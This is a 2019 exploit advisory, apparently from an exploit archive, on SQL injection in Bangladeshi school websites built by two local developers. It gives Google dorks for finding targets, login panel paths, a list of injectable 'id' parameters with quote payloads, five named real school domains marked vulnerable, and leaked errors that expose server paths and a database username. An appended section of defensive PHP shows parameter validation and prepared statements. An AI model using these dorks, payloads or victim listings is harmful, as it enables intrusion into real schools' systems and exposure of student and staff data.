Soft IT Security Hululu IT Bangladesh SQL Injection Vulnerability

2019.01.07
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###############################################################

# Exploit Title : Soft IT Security Hululu IT Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : softitsecurity.com ~ hululuit.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : intext:''© Copyright 2019. Designed and Developed by Soft IT Security'' site:edu.bd
intext:''© Copyright 2019. Designed and Developed by Hululu IT'' site:edu.bd
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-soft-it-security-hululu-it-bangladesh-sql-injection.html

###############################################################

Admin/Teacher/Student Panel Login Path =>

/adminoperation/
/teacheroperation/
/studentoperation/

# SQL Injection Exploits :
**********************

/?v=home.jsp&id=[SQL Injection]
/?v=administrationdeatils.jsp&id=[SQL Injection]
/?v=allteacher.jsp&id=[SQL Injection]
/?v=allclark.jsp&id=[SQL Injection]
/?v=talentstudent-detail.jsp&id=[SQL Injection]
/?v=allstudent.jsp&id=[SQL Injection]
/?v=boardresultdetails.jsp&id=1%27
/?v=universitydetails.jsp&id=[SQL Injection]
/?v=talentteacher-detail.jsp&id=[SQL Injection]
/?v=academiccalender-details.jsp&id=[SQL Injection]
/?v=allevent.jsp&id=[SQL Injection]
/?v=allresult.jsp&id=[SQL Injection]
/?v=noticebord-detail.jsp&id=[SQL Injection]
/?v=uploadbook-details.jsp&id=[SQL Injection]
/?v=usefulllinkdetails.jsp&id=[SQL Injection]
/?v=checkclass.jsp&id=[SQL Injection]

###############################################################

# Example Vulnerable Sites =>
***************************

Note : (192.185.94.62) => There are 182 domains hosted on this server.

[+] birgardusafiaalimmadrasah.edu.bd/?v=administrationdeatils.jsp&id=3%27
[+] haripuralimmadrasha.edu.bd/?v=administrationdeatils.jsp&id=3%27
[+] tislamunionhighschool.edu.bd/?v=administrationdeatils.jsp&id=3%27
[+] haripurwomenscollege.edu.bd/?v=administrationdeatils.jsp&id=3%27
[+] jamunhndm.edu.bd/?v=administrationdeatils.jsp&id=3%27

###############################################################

# SQL Database Error :
*********************

Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/birgardusafiaali/public_html/DAL/DbConnect.php on line 8

Warning: mysql_connect(): Access denied for user 'birgardu_school'@'localhost' (using password: YES) in /home/birgardusafiaali/public_html/DAL/DbConnect.php on line 8

Warning: fread(): Length parameter must be greater than 0 in /home/haripuralimmadra/public_html/controller/function.php on line 220

###############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###############################################################
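Added example, not part of the original advisory and not the vendor's code: a hardened PHP 8 handler for the `id` parameter listed above, combining strict integer validation, a PDO prepared statement (the replacement the quoted deprecation notice itself recommends), and error display turned off so that warnings like those quoted under "SQL Database Error" are logged instead of sent to the client. The `administration` table, its columns and the function names are hypothetical, and an in-memory SQLite database stands in for the site's MySQL database.

```php
<?php
declare(strict_types=1);

// Keep PHP warnings (file paths, DB user names) out of responses; log them instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/** Accept only a plain positive decimal integer for id; anything else is null. */
function parse_id(mixed $raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw)) {
        return null;               // rejects "3'", "3 OR 1=1", "-1", "", arrays
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;   // also rejects overflow and leading zeros
}

/** Fetch one row with a bound parameter; the id never becomes part of the SQL text. */
function fetch_administration(PDO $db, int $id): ?array
{
    // Hypothetical table and column names.
    $stmt = $db->prepare('SELECT id, name, designation FROM administration WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data. SQLite in memory stands in for the MySQL database;
// with MySQL, use a "mysql:host=...;dbname=...;charset=utf8mb4" DSN and set
// PDO::ATTR_EMULATE_PREPARES to false so the server does the parameter binding.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE administration (id INTEGER PRIMARY KEY, name TEXT, designation TEXT)');
$db->exec("INSERT INTO administration VALUES (3, 'Constructed Name', 'Principal')");

foreach (['3', "3'", '3 OR 1=1', ''] as $raw) {   // constructed id values
    $id = parse_id($raw);
    if ($id === null) {
        echo json_encode($raw), " -> 400 Bad Request\n";
        continue;
    }
    $row = fetch_administration($db, $id);
    echo json_encode($raw), ' -> ', $row ? $row['name'] : '404 Not Found', "\n";
}
```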



Copyright 2019, cxsecurity.com

 
